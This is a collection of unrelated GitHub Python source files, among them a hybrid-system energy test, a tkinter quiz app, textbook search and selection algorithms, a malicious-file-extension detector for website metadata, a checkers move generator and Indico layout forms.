old_force = self._old_forces[forcename],\n new_force = self._new_forces[forcename],\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n num_hybrid_particles = self._hybrid_system.getNumParticles(),\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n **kwargs)\n out_force = valence_hbf_factory.hybrid_force\n self._hybrid_system.addForce(out_force)\n\n if 'NonbondedForce' in joint_forcenames:\n nb_converter_factory = nonbonded_converter(\n old_nbf=self._old_forces['NonbondedForce'],\n new_nbf=self._new_forces['NonbondedForce'],\n old_to_hybrid_map=self._old_to_hybrid_map,\n new_to_hybrid_map=self._new_to_hybrid_map,\n num_hybrid_particles=self._hybrid_system.getNumParticles(),\n unique_old_atoms=self._unique_old_atoms,\n unique_new_atoms=self._unique_new_atoms,\n **kwargs)\n hybrid_rf_nbfs = nb_converter_factory.rf_forces\n _ = [self._hybrid_system.addForce(_q) for _q in hybrid_rf_nbfs]\n\n def test_energy_endstates(self, old_positions, new_positions, atol=1e-2,\n rtol=1e-6, verbose=False, context_args=(),\n old_global_parameters = {'lambda_global': 0., 'retain_exception_switch': 0., 'retain_uniques': 0.},\n new_global_parameters = {'lambda_global': 1., 'retain_exception_switch': 0., 'retain_uniques': 0.},\n return_energy_differences=False, **kwargs):\n \"\"\"test the endstates energy bookkeeping here;\n WARNING: for complex phase, this is an expensive operation (~30s on CPU).\n 
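The defaults for old_global_parameters and new_global_parameters pin the\n        hybrid system at the lambda_global = 0 and lambda_global = 1 endstates,\n        respectively, before each endstate is compared against its\n        non-alchemical reaction-field reference system.\n        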
\"\"\"\n from aludel.atm import (energy_by_force,\n get_hybrid_positions, get_original_positions_from_hybrid)\n from aludel.rf import ReactionFieldConverter\n\n if verbose: print(f\"generating old rf system...\")\n old_rf_system = ReactionFieldConverter(self._old_system, **kwargs).rf_system\n if verbose: print(f\"generating new rf system...\")\n new_rf_system = ReactionFieldConverter(self._new_system, **kwargs).rf_system\n\n hybrid_system = self.hybrid_system\n hybrid_positions = get_hybrid_positions(old_positions=old_positions,\n new_positions=new_positions, num_hybrid_particles=self._hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map, new_to_hybrid_map = self._new_to_hybrid_map,\n **kwargs)\n old_positions = get_original_positions_from_hybrid(hybrid_positions=hybrid_positions,\n hybrid_to_original_map=self._hybrid_to_old_map, **kwargs)\n new_positions = get_original_positions_from_hybrid(hybrid_positions=hybrid_positions,\n hybrid_to_original_map=self._hybrid_to_new_map, **kwargs)\n\n # first, retrieve the old/new system forces by object\n if verbose: print(f\"computing old force energies.\")\n old_es = energy_by_force(system = copy.deepcopy(old_rf_system),\n reference_positions = old_positions, context_args = context_args)\n if verbose: print(f\"computing new force energies\")\n new_es = energy_by_force(system = copy.deepcopy(new_rf_system),\n reference_positions = new_positions, context_args = context_args)\n\n if verbose: print(f\"computing old hybrid force energies...\")\n hybr_old_es = energy_by_force(system = self.hybrid_system,\n reference_positions = hybrid_positions, global_parameters=old_global_parameters,\n context_args = context_args)\n if verbose: print(f\"computing new hybrid force energies...\")\n hybr_new_es = energy_by_force(system = copy.deepcopy(self.hybrid_system),\n reference_positions = hybrid_positions, global_parameters=new_global_parameters,\n context_args = context_args)\n\n # old match\n old_es_sum = np.sum(list(old_es.values()))\n hybr_old_es_sum = np.sum(list(hybr_old_es.values()))\n old_pass = np.isclose(old_es_sum, hybr_old_es_sum,\n atol=atol, rtol=rtol)\n if not old_pass:\n print(f\"\"\"energy match of old/hybrid-old system failed; printing energy by forces...\\n\n \\t{old_es_sum}\\n\\t{hybr_old_es_sum}\"\"\")\n else:\n print(f\"passed with energy match: {old_es_sum, hybr_old_es_sum}\")\n\n # new match\n new_es_sum = np.sum(list(new_es.values()))\n hybr_new_es_sum = np.sum(list(hybr_new_es.values()))\n new_pass = np.isclose(new_es_sum, hybr_new_es_sum,\n atol=atol, rtol=rtol)\n if not new_pass:\n print(f\"\"\"energy match of new/hybrid-new system failed; printing energy by forces...\\n\n \\t{new_es_sum}\\n\\t{hybr_new_es_sum}\"\"\")\n else:\n print(f\"passed with energy match: {new_es_sum, hybr_new_es_sum}\")\n\n if verbose:\n for nonalch_state, alch_state, state_name in zip(\n [old_es, new_es], [hybr_old_es, hybr_new_es], ['old', 'new']):\n print(f\"\"\"printing {state_name} nonalch and alch energies by force:\"\"\")\n for _force, _energy in nonalch_state.items():\n print(f\"\\t\", _force.__class__.__name__, _energy)\n print(\"\\n\")\n for _force, _energy in alch_state.items():\n print(f\"\\t\", _force.__class__.__name__, _energy)\n\n if return_energy_differences:\n return [[old_es_sum, hybr_old_es_sum], [new_es_sum, hybr_new_es_sum]]\n else:\n if not old_pass: raise Exception(f\"old failed\")\n if not new_pass: raise Exception(f\"new failed\")\n\nclass ThetaIntegratorSCRFSingleTopologyHybridSystemFactory(\n 
SCRFSingleTopologyHybridSystemFactory):\n \"\"\"convert a hybrid system controlled by `softcore_alpha` to a hybrid system controlled by `theta_global`\"\"\"\n def __init__(self, *args, **kwargs):\n # define `softcore_alpha_str`, `default_theta_global`, `theta_global_energy_str`\n super().__init__(*args, **kwargs)\n\n def _get_nonbonded_converter(self, **unused_kwargs):\n from aludel.rf import ThetaIntegratorSingleTopologyHybridNBFReactionFieldConverter\n return ThetaIntegratorSingleTopologyHybridNBFReactionFieldConverter\n","repo_name":"dominicrufa/aludel","sub_path":"aludel/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":45518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"39356618643","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizzlerInterface:\n\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"Quizzler\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n self.score = Label(text=\"score: 0\", bg=THEME_COLOR, fg=\"white\", font=(\"Arial\", 16))\n self.score.grid(row=0, column=1)\n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.quiz_text = self.canvas.create_text(150,\n 125,\n text=\"quiz here...\",\n fill=THEME_COLOR,\n width=250,\n font=(\"Arial\", 16, \"italic\"))\n self.canvas.grid(row=1, column=0, columnspan=2, pady=50)\n self.trueImg = PhotoImage(file=\"images/true.png\")\n self.trueBtn = Button(image=self.trueImg, highlightthickness=0, command=self.pressedTrue)\n self.trueBtn.grid(row=2, column=0)\n\n self.falseImg = PhotoImage(file=\"images/false.png\")\n self.falseBtn = Button(image=self.falseImg, highlightthickness=0, command=self.pressedFalse)\n self.falseBtn.grid(row=2, column=1)\n self.get_next_quiz()\n\n self.window.mainloop()\n\n def get_next_quiz(self):\n self.canvas.config(bg=\"white\")\n if self.quiz.still_has_questions():\n self.score.config(text=f\"score: {self.quiz.score}\")\n q_text = self.quiz.next_question()\n self.canvas.itemconfig(self.quiz_text, text=q_text)\n else:\n self.canvas.itemconfig(self.quiz_text, text=\"You have done the quiz game!\")\n self.trueBtn.config(state=\"disabled\")\n self.falseBtn.config(state=\"disabled\")\n\n def pressedTrue(self):\n is_right = self.quiz.check_answer(\"True\")\n self.give_feedback(is_right)\n\n def pressedFalse(self):\n is_right = self.quiz.check_answer(\"False\")\n self.give_feedback(is_right)\n\n def give_feedback(self, is_right):\n if is_right:\n self.canvas.config(bg=\"green\")\n else:\n self.canvas.config(bg=\"red\")\n self.window.after(1000, self.get_next_quiz)\n","repo_name":"KoshCocna/25_quizzler","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2740596795","text":"#!/usr/bin/python3\n\"\"\"\n 2-read_lines\n\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\" reads n lines of a text file\"\"\"\n line_num = 0\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n if line_num < nb_lines or not nb_lines or nb_lines < 0:\n print(line, end=\"\")\n line_num += 
1\n","repo_name":"jashjchoi/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74911831768","text":"numberlist = [3,5,6,7,9,12,15,18,23,24,26,38,59,64,83]\r\nnumber_to_find = 15\r\ndef binnary_search(number_list, number_to_find):\r\n left_index = 0\r\n right_index = len(number_list)-1\r\n mid_index = 0\r\n\r\n while left_index <= right_index:\r\n mid_index = (left_index+right_index)//2\r\n mid_number = number_list[mid_index]\r\n\r\n if mid_number == number_to_find:\r\n return mid_index\r\n\r\n if mid_number < number_to_find:\r\n left_index = mid_index+1\r\n\r\n else:\r\n right_index = mid_index-1\r\n\r\n return -1\r\n\r\nprint(f'index of the number is: {binnary_search(numberlist, number_to_find)}')\r\n\r\n","repo_name":"kartikey1998/Algorithms","sub_path":"Binary search/binary search.py","file_name":"binary search.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2188611569","text":"from features.metadata_base import MetadataBase\nfrom features.website_manager import WebsiteData\nfrom lib.constants import VALUES\n\n\nclass MaliciousExtensions(MetadataBase):\n # Based on: https://www.file-extensions.org/filetype/extension/name/dangerous-malicious-files\n # https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows/\n # https://sensorstechforum.com/file-types-used-malware-2019/\n # https://www.howtogeek.com/127154/how-hackers-can-disguise-malicious-programs-with-fake-file-extensions/\n malicious_extensions = [\n \"msp\",\n \"cfxxe\",\n \"php3\",\n \"vb\",\n \"swf\",\n \"mcq\",\n \"dyv\",\n \"html\",\n \"ps1\",\n \"9\",\n \"ocx\",\n \"chm\",\n \"mshxml\",\n \"lkh\",\n \"hlp\",\n \"iws\",\n \"gadget\",\n \"pr\",\n \"wlpginstall\",\n \"kcd\",\n \"docx\",\n \"dom\",\n \"hsq\",\n \"aepl\",\n \"0_full_0_tgod_signed\",\n \"dyz\",\n \"psc1\",\n \"py\",\n \"cyw\",\n \"blf\",\n \"osa\",\n \"pdf\",\n \"shs\",\n \"xlm\",\n \"exe_renamed\",\n \"exe1\",\n \"pif\",\n \"xir\",\n \"vbs\",\n \"qrn\",\n \"mjg\",\n \"fag\",\n \"xdu\",\n \"xlam\",\n \"com\",\n \"ps2xml\",\n \"reg\",\n \"cpl\",\n \"plc\",\n \"ska\",\n \"xlv\",\n \"bmw\",\n \"msc\",\n \"tko\",\n \"rna\",\n \"msh2xml\",\n \"wmf\",\n \"hlw\",\n \"uzy\",\n \"nls\",\n \"inf\",\n \"iva\",\n \"zix\",\n \"gzquar\",\n \"cxq\",\n \"ppam\",\n \"bps\",\n \"ppt\",\n \"dxz\",\n \"ezt\",\n \"jse\",\n \"xnxx\",\n \"xls\",\n \"aru\",\n \"lok\",\n \"hta\",\n \"vba\",\n \"xltm\",\n \"atm\",\n \"xtbl\",\n \"txs\",\n \"xlsm\",\n \"mjz\",\n \"mfu\",\n \"wsf\",\n \"cih\",\n \"xnt\",\n \"capxml\",\n \"sfx\",\n \"fjl\",\n \"cmd\",\n \"msh\",\n \"aut\",\n \"ws\",\n \"tti\",\n \"dlb\",\n \"msh1\",\n \"ozd\",\n \"fuj\",\n \"exe\",\n \"class\",\n \"386\",\n \"qit\",\n \"ps2\",\n \"delf\",\n \"cla\",\n \"ps1xml\",\n \"bkd\",\n \"bin\",\n \"dev\",\n \"cc\",\n \"sys\",\n \"dx\",\n \"vbx\",\n \"bup\",\n \"vxd\",\n \"rsc_tmp\",\n \"spam\",\n \"tps\",\n \"htm\",\n \"wsh\",\n \"bll\",\n \"sop\",\n \"wsc\",\n \"bxz\",\n \"jar\",\n \"tsa\",\n \"msi\",\n \"pcx\",\n \"vbe\",\n \"smm\",\n \"rhk\",\n \"dli\",\n \"application\",\n \"let\",\n \"pid\",\n \"upa\",\n \"msh1xml\",\n \"ce0\",\n \"psc2\",\n \"msh2\",\n \"lpaq5\",\n \"ctbl\",\n \"boo\",\n \"js\",\n \"buk\",\n \"hts\",\n \"sldm\",\n \"bat\",\n \"smtmp\",\n \"dllx\",\n 
\"ppsm\",\n \"docm\",\n \"bhx\",\n \"scf\",\n \"fnr\",\n \"pptm\",\n \"drv\",\n \"doc\",\n \"vzr\",\n \"ssy\",\n \"scr\",\n \"dotm\",\n \"s7p\",\n \"ceo\",\n \"tmp\",\n \"lik\",\n \"lnk\",\n \"pgm\",\n \"dll\",\n \"oar\",\n \"bqf\",\n \"zvz\",\n \"dbd\",\n \"vexe\",\n \"potm\",\n \"\\u202e\",\n ]\n decision_threshold = 0\n\n def _start(self, website_data: WebsiteData) -> dict:\n malicious_extensions = [\n extension\n for extension in website_data.extensions\n if extension.replace(\".\", \"\") in self.malicious_extensions\n ]\n return {VALUES: malicious_extensions}\n","repo_name":"codecentric/metadata_picker","sub_path":"src/features/malicious_extensions.py","file_name":"malicious_extensions.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16055596459","text":"# This algorithm is a faster implementation of quick select where I use momselect to choose the median of median in an array to be the pivot_index for partition (to choose good pivot) and then do the normal quick select to find the median/kth smallest. The idea of mom select is to choose a good pivot for partition which will make quick select faster by avoiding choosing a bad pivot and spending more time finding the median.\n# Time Complexity : O(n)\n# Space Complexity : O(n), partition is not in place, creates two extra arrays. it could be done in palce though\n\ndef momselect(arr, k) :\n\n # mom select to find median of medians\n m = len(arr)//5\n remainder = len(arr) % 5\n medians = []\n \n # split array into arrays of five elements\n for i in range(m) :\n left = 5*i\n right = 5*(i+1)-1\n medians.append(medianOfFive(arr, left, right))\n if remainder > 0 :\n left = len(arr)-remainder\n right = left+remainder-1\n medians.append(medianOfFive(arr, left, right))\n\n # find good pivot (median of medians)\n mom_value = momselect(medians, len(medians)//2)\n \n # find the index of mom_value in the arr\n for i in range(len(arr)) :\n if arr[i][0] == mom_value :\n pivot_idx = i\n\n left_arr, right_arr, piv_value = partition(arr, pivot_idx)\n\n # if the k(targeted index) is on the left array, then recurse on left array\n if k < len(left_arr) : # new pivot index\n return momselect(left_arr, k)\n # if the k(targeted index) is on the right array, then recurse on right array\n elif k > len(left_arr) :\n return momselect(right_arr, k-len(left_arr)-1)\n # if the pivot_idx is equal to the targeted index, then the element we looking for is sorted\n else :\n return piv_value\n\n# Sort the array where \ndef partition(array, pivot_index):\n '''return some version of a partitioned array'''\n lesser = []\n greater = []\n piv_value = array[pivot_index][0]\n for pair in array:\n if pair[0] < piv_value:\n lesser.append(pair)\n elif pair[0] > piv_value:\n greater.append(pair)\n return lesser, greater, piv_value\n\n# find the median in n=5 array\ndef medianOfFive(arr, left_idx, right_idx) :\n new_arr = []\n for i in range(left_idx, right_idx+1):\n new_arr.append(arr[i])\n\n new_arr = sorted(new_arr)\n return new_arr[len(new_arr)//2]\n","repo_name":"NasserMughrabi/Sorting-Algorithms","sub_path":"momselect.py","file_name":"momselect.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16346398912","text":"import math\r\n# METHOD: BI-SECTION\r\n\r\nH1 = 24831 #J/mol\r\nH2 = -5118 #J/mol\r\nm0 = 0.06156 #kg/kg\r\nR = 8.314 #J/mol/K\r\nT = (52.6 + 273.15) 
\r\nH1 = 24831 #J/mol\r\nH2 = -5118 #J/mol\r\nm0 = 0.06156 #kg/kg\r\nR = 8.314 #J/mol/K\r\nT = (52.6 + 273.15) #K\r\nC0 = 0.001645\r\nK0 = 5.710\r\nXe = 0.133 #kg/kg\r\na = 0\r\nb = 1\r\nm = 0\r\na = 0.6480666248504123\r\n\r\n\r\nC = C0*math.exp(H1/(R*T))\r\nK = K0*math.exp(H2/(R*T))\r\n\r\ns =math.pow(a,2)* math.pow(K,2)*Xe*(1-C) + a*K*(C*(Xe-m0)-(2*Xe)) + Xe\r\ny = ((C*K*a*m0)/(1-(a*K))*(1-(K*a)+(C*K*a))) -Xe\r\nprint(s)\r\nprint(y)\r\n\r\ndef fnEval(a):\r\n    # Evaluate function of a, written as quadratic equation\r\n    return math.pow(a,2)* math.pow(K,2)*Xe*(1-C) + a*K*(C*(Xe-m0)-(2*Xe)) + Xe\r\n\r\n#print(fnEval(0.6480666248504123))\r\nprint(\"initial values: a=0, b=1\")\r\n\r\nn= 70 # Stopping criterion (number of iterations)\r\nwhile(n>0):\r\n    m = (a + b)/2 # find mid point\r\n    if fnEval(a) * fnEval(m) < 0:\r\n        b = m # the sign change is in [a, m], so set b = m\r\n        print(\"At Iteration\",70-n+1,\", a=\",m)\r\n    elif fnEval(b) * fnEval(m) < 0:\r\n        a = m # the sign change is in [m, b], so set a = m\r\n        print(\"At Iteration\",70-n+1,\", a=\",m)\r\n    else: # if function at m evaluates to zero, the exact root has been found\r\n        print(\"Root of the function: \", m)\r\n        break\r\n    n = n-1\r\n\r\ninput()\r\n","repo_name":"B-sharp-shark/Numerical-Methods","sub_path":"BisectionCode.py","file_name":"BisectionCode.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72218082007","text":"class Solution(object):\n    def carFleet(self, target, position, speed):\n        \"\"\"\n        :type target: int\n        :type position: List[int]\n        :type speed: List[int]\n        :rtype: int\n        \"\"\"\n# 12\n# [10,8,0,5,3]\n# [2,4,1,1,3]\n\n# cars = [p, s] ==> sort the cars according to position\n# [0,1] , [3,3], [5,1], [8,4], [10,2]\n# stack = [12 , 3, 7, 1, 1] ==> (target - position) / speed\n# for each pair, append required time to stack if cur_time > stack[-1]\n# result is the len of stack\n\n        cars = [ [p, s] for p, s in zip(position, speed)]\n        stack = []\n        cars.sort(reverse =True)\n        \n        for p, s in cars:\n            stack.append(((target-p)/s))\n            if len(stack)>=2 and stack[-1]<=stack[-2]:\n                stack.pop()\n        \n        return len(stack)","repo_name":"CodeHana/LC","sub_path":"853-car-fleet/853-car-fleet.py","file_name":"853-car-fleet.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43100738268","text":"import datetime\nfrom django.db import models\nfrom django.db.models import Q, Count, Avg, Sum\nfrom django.db.models.functions import Lower\n\nclass PrestamoManager(models.Manager):\n    ''' procedures for prestamo (loan) records '''\n\n    def libros_promedio_edades(self):\n        resultado = self.filter(libro__id='1').aggregate(promedio_edad=Avg('lector__edad'),\n                                                suma_edad=Sum('lector__edad'))\n        return resultado\n        #this query returns the average age and the sum of the ages of everyone...\n        #who has borrowed the book with id = 1\n        #first I filter by the book in the prestamo table and then do the math...\n        #over the ages of the people who borrowed it\n\n    def num_libros_prestados(self):\n        resultado = self.values('libro').annotate(num_prestados = Count('libro'),\n                                titulo = Lower('libro__titulo'),)\n\n        for r in resultado:\n            print('================')\n            print(r, r['num_prestados'])\n\n        return resultado\n\n    #this function returns how many times a book has been borrowed\n    #using values() was necessary because annotate() on its own brought back the\n    #borrowed books individually, repeating records instead of summing them;\n    #with values() I give it a single grouping key,\n
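    #Illustrative use (names assumed for this note, not from the original project):\n    #    Prestamo.objects.num_libros_prestados()\n    #would print one grouped row per book, e.g. {'libro': 1, 'num_prestados': 3}\n\n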
        #which is the book itself, so the records can then be counted\n        #and shown grouped, instead of showing each record individually\n\n    #IF THE MANAGER HAS NO VIEW, IT IS BECAUSE IT WAS VALIDATED IN THE SHELL!","repo_name":"estebancolhe/biblioteca","sub_path":"applications/lector/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43825720166","text":"from __future__ import annotations\nimport argparse\nimport copy\nimport sys\nimport time\nfrom typing import List\n\n\ncache = {} # you can use this to implement state caching!\n\n\ndef directions(piece: str) -> list[tuple[int, int]]:\n    if piece == \"b\":\n        return [(1, 1), (-1, 1)]\n    elif piece == 'r':\n        return [(1, -1), (-1, -1)]\n    else:\n        return [(1, 1), (1, -1), (-1, 1), (-1, -1)]\n\n\ndef promote(board, x, y):\n    if board[y][x] == 'b' and y == 7:\n        board[y][x] = 'B'\n    elif board[y][x] == 'r' and y == 0:\n        board[y][x] = 'R'\n\n\nclass State:\n    # This class is used to represent a state.\n    # board : a list of lists that represents the 8*8 board\n    def __init__(self, board, turn, depth):\n        self.board = board\n        self.turn = turn\n        self.depth = depth\n\n    def __repr__(self):\n        s = \"\"\n        for i in range(8):\n            for j in range(8):\n                s += self.board[i][j]\n            s += \"\\n\"\n        return s\n\n    def __hash__(self):\n        return hash(str(self.board))\n\n    def __eq__(self, other):\n        return self.board == other.board\n\n    def next_state(self, board):\n        return State(board, get_next_turn(self.turn), self.depth - 1)\n\n    def single_moves(self, x, y) -> List[State]:\n        moves = []\n        piece = self.board[y][x]\n        if piece == '.' or piece.lower() != self.turn:\n            return []\n        for dx, dy in directions(piece):\n            new_x, new_y = x + dx, y + dy\n            if new_x < 0 or new_x >= 8 or new_y < 0 or new_y >= 8:\n                continue\n            if self.board[new_y][new_x] == '.':\n                new_board = copy.deepcopy(self.board) # TODO: get rid of this if too slow\n                new_board[new_y][new_x] = new_board[y][x]\n                promote(new_board, new_x, new_y)\n                new_board[y][x] = '.'\n                moves.append(self.next_state(new_board))\n        return moves\n\n    def double_moves(self, x, y) -> List[State]:\n        moves = []\n        piece = self.board[y][x]\n        if piece == '.' or piece.lower() != self.turn:\n            return []\n        for dx, dy in directions(piece):\n            new_x, new_y = x + 2 * dx, y + 2 * dy\n            capture_x, capture_y = x + dx, y + dy\n            if new_x < 0 or new_x >= 8 or new_y < 0 or new_y >= 8:\n                continue\n            if self.board[new_y][new_x] == '.' 
and self.board[capture_y][capture_x] in get_opp_char(self.turn):\n new_board = copy.deepcopy(self.board)\n new_board[new_y][new_x] = new_board[y][x]\n new_board[y][x] = '.'\n new_board[y + dy][x + dx] = '.'\n promote(new_board, new_x, new_y)\n further_jumps = State(new_board, self.turn, self.depth).double_moves(new_x, new_y)\n if further_jumps:\n moves.extend(further_jumps)\n else:\n moves.append(self.next_state(new_board))\n return moves\n\n def generate_successors(self) -> List[State]:\n moves_single = []\n moves_double = []\n for y in range(8):\n for x in range(8):\n moves_single.extend(self.single_moves(x, y))\n moves_double.extend(self.double_moves(x, y))\n return moves_double if moves_double else moves_single\n\n def is_terminal(self):\n return 0 in self.count()\n\n def count(self):\n b_pieces, r_pieces = 0, 0\n for row in self.board:\n for col in row:\n if col == 'b':\n b_pieces += 1\n elif col == 'B':\n b_pieces += 2\n elif col == 'r':\n r_pieces += 1\n elif col == 'R':\n r_pieces += 2\n return r_pieces, b_pieces\n\n def eval(self):\n return self.count()[0] - self.count()[1]\n\n\n\ndef get_opp_char(player):\n if player in ['b', 'B']:\n return ['r', 'R']\n else:\n return ['b', 'B']\n\n\ndef get_next_turn(curr_turn):\n if curr_turn == 'r':\n return 'b'\n else:\n return 'r'\n\n\ndef read_from_file(filename):\n f = open(filename)\n lines = f.readlines()\n board = [[str(x) for x in l.rstrip()] for l in lines]\n f.close()\n\n return board\n\n\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser()\n # parser.add_argument(\n # \"--inputfile\",\n # type=str,\n # required=True,\n # help=\"The input file that contains the puzzles.\"\n # )\n # parser.add_argument(\n # \"--outputfile\",\n # type=str,\n # required=True,\n # help=\"The output file that contains the solution.\"\n # )\n # args = parser.parse_args()\n #\n # initial_board = read_from_file(args.inputfile)\n # state = State(initial_board)\n # turn = 'r'\n # ctr = 0\n #\n # sys.stdout = open(args.outputfile, 'w')\n #\n # sys.stdout = sys.__stdout__\n board = read_from_file('checkers.txt')\n state = State(board, 'r', 5)\n print(str(state))\n print(state.generate_successors())\n print(state.eval())\n\n","repo_name":"laviealon/CheckersSolver1","sub_path":"checkers_starter.py","file_name":"checkers_starter.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8790062566","text":"from PyQt4.QtGui import QGraphicsItem\nfrom PyQt4.QtGui import QPen\nfrom PyQt4.QtGui import QColor\nfrom PyQt4.QtCore import QLineF, QRectF, QPointF\nimport random\n\nclass Path(QGraphicsItem):\n\tdef __init__(self, start, end, pen = QPen(QColor(0,0,0,255))):\n\t\tself.pen = pen\n\n\t\tQGraphicsItem.__init__(self)\n\n\t\tself.starting_line = QLineF(start, end)\n\t\tself.bounds = QRectF(\n\t\t\tstart - (end - start),\n\t\t\tend + (end - start))\n\n\t\tself.steps = 4\n\t\tself.smooth = 50\n\t\tself.dampen = 100\n\t\tself.update_lines()\n\n\tdef update_lines(self):\n\t\tself.prepareGeometryChange()\n\t\tself.lines = self.generate_lines(\n\t\t\tself.starting_line,\n\t\t\tself.steps,\n\t\t\tself.smooth / 100.0,\n\t\t\tself.dampen / 100.0)\n\n\tdef generate_lines(self, line, steps = 4, smooth = 0.7, dampen = 1.0):\n\t\tif steps <= 0:\n\t\t\treturn [line]\n\t\tmid = (line.p1() + line.p2()) * 0.5\n\t\tdiff = (line.p2() - line.p1())\n\t\tnorm = QPointF(-diff.y(), diff.x())\n\t\tmid += norm * (random.random() - 0.5) * smooth\n\t\treturn 
self.generate_lines(\n\t\t\tQLineF(line.p1(), mid), steps - 1, smooth * dampen\n\t\t\t) + self.generate_lines(\n\t\t\tQLineF(mid, line.p2()), steps - 1, smooth * dampen)\n\n\tdef paint(self, painter, option, widget = None):\n\t\tpainter.setPen(self.pen)\n\t\tfor line in self.lines:\n\t\t\tpainter.drawLine(line)\n\n\tdef boundingRect(self):\n\t\treturn self.bounds\n","repo_name":"nmeyering/squiggly","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73342039447","text":"from wtforms.fields import BooleanField, SelectField, TextAreaField, URLField\nfrom wtforms.fields.simple import StringField\nfrom wtforms.validators import DataRequired, Optional, ValidationError\n\nfrom indico.core.config import config\nfrom indico.core.db.sqlalchemy.protection import ProtectionMode\nfrom indico.modules.events.layout import theme_settings\nfrom indico.modules.events.layout.models.menu import MenuEntry\nfrom indico.modules.events.layout.util import get_css_file_data, get_logo_data, get_plugin_conference_themes\nfrom indico.modules.users import NameFormat\nfrom indico.util.i18n import _, orig_string\nfrom indico.web.forms.base import IndicoForm\nfrom indico.web.forms.fields import EditableFileField, FileField, IndicoEnumSelectField, IndicoProtectionField\nfrom indico.web.forms.fields.principals import PrincipalListField\nfrom indico.web.forms.validators import HiddenUnless, UsedIf\nfrom indico.web.forms.widgets import ColorPickerWidget, SwitchWidget, TinyMCEWidget\n\n\nTHEMES = [('', _('No theme selected')),\n ('orange.css', _('Orange')),\n ('brown.css', _('Brown')),\n ('right_menu.css', _('Right menu'))]\n\n\ndef _get_timetable_theme_choices(event):\n it = ((tid, data['title']) for tid, data in theme_settings.get_themes_for(event.type).items())\n return sorted(it, key=lambda x: x[1].lower())\n\n\ndef _get_conference_theme_choices():\n plugin_themes = [(k, v.title) for k, v in get_plugin_conference_themes().items()]\n return THEMES + sorted(plugin_themes, key=lambda x: x[1].lower())\n\n\nclass LoggedLayoutForm(IndicoForm):\n @classmethod\n def build_field_metadata(cls, field):\n if field.short_name == 'name_format':\n return {'title': orig_string(field.label.text),\n 'default': orig_string(field.none)}\n elif field.short_name == 'theme':\n choices = {(k or None): orig_string(v) for k, v in field.choices}\n return {'title': orig_string(field.label.text),\n 'type': 'string',\n 'convert': lambda changes: [choices.get(x) for x in changes]}\n elif field.short_name == 'timetable_theme':\n choices = {(k or None): v for k, v in field.choices}\n return {'title': orig_string(field.label.text),\n 'type': 'string',\n 'convert': lambda changes: [choices.get(x) for x in changes]}\n else:\n return orig_string(field.label.text)\n\n @property\n def log_fields_metadata(self):\n return {k: self.build_field_metadata(v) for k, v in self._fields.items()}\n\n\nclass ConferenceLayoutForm(LoggedLayoutForm):\n is_searchable = BooleanField(_('Enable search'), widget=SwitchWidget(),\n description=_('Enable search within the event'))\n show_nav_bar = BooleanField(_('Show navigation bar'), widget=SwitchWidget(),\n description=_('Show the navigation bar at the top'))\n show_banner = BooleanField(_('\"Now happening\"'), widget=SwitchWidget(),\n description=_('Show a banner with the current entries from the timetable'))\n show_social_badges = BooleanField(_('Show social badges'), 
widget=SwitchWidget())\n name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat, none=_('Inherit from user preferences'),\n description=_('Format in which names are displayed'))\n show_vc_rooms = BooleanField(_('Show videoconferences'), widget=SwitchWidget(),\n description=_('Show videoconferences on the main conference page'))\n\n # Style\n header_text_color = StringField(_('Text color'), widget=ColorPickerWidget())\n header_background_color = StringField(_('Background color'), widget=ColorPickerWidget())\n\n # Announcement\n announcement = StringField(_('Announcement'),\n [UsedIf(lambda form, field: form.show_announcement.data)],\n description=_('Short message shown below the title'))\n show_announcement = BooleanField(_('Show announcement'), widget=SwitchWidget(),\n description=_('Show the announcement message'))\n\n # Timetable\n timetable_by_room = BooleanField(_('Group by room'), widget=SwitchWidget(),\n description=_('Group the entries of the timetable by room by default'))\n timetable_detailed = BooleanField(_('Show detailed view'), widget=SwitchWidget(),\n description=_('Show the detailed view of the timetable by default.'))\n timetable_theme = SelectField(_('Theme'), [Optional()], 